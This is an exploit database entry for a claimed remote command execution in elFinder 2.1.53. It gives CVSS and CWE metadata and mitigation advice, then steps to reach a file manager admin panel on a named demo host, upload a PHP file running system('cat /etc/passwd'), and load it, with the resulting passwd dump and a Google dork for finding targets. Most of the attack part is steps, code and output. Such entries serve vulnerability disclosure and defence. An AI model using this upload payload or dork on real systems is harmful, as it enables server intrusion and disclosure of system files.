Remote Command Execution in elFinder Web file manager Version 2.1.53

vendor:

elFinder Web file manager

by:

tmrswrr

6.1

CVSS

HIGH

Remote Command Execution

CWE

Product Name: elFinder Web file manager

Affected Version From: 2.1.53

Affected Version To: 2.1.53

Patch Exists: NO

Related CWE:

CPE: a:studio-42:elfinder:2.1.53

Metasploit:

Other Scripts:

Platforms Tested: https://www.softaculous.com/apps/cms/CSZ_CMS

2023

Remote Command Execution in elFinder Web file manager Version 2.1.53

The elFinder Web file manager version 2.1.53 allows remote attackers to execute arbitrary commands via an admin panel URL, which can lead to sensitive information disclosure. An attacker can upload a malicious PHP file to the target server and execute system commands, as demonstrated by accessing the /etc/passwd file.

Mitigation:

To mitigate this vulnerability, users are advised to update the elFinder software to the latest version and restrict access to the admin panel to authorized personnel only.

Source

Exploit-DB raw data:

# Exploit Title: elFinder Web file manager Version: 2.1.53 Remote Command Execution
# Date: 23/11/2023
# Exploit Author: tmrswrr
# Google Dork: intitle:"elFinder 2.1.53"
# Vendor Homepage: https://studio-42.github.io/elFinder/
# Software Link: https://github.com/Studio-42/elFinder/archive/refs/tags/2.1.53.zip
# Version: 2.1.53
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/admin/filemanager
2 ) Click Template Main and upload this test.php file :

<?php echo system('cat /etc/passwd'); ?>

3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.php

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false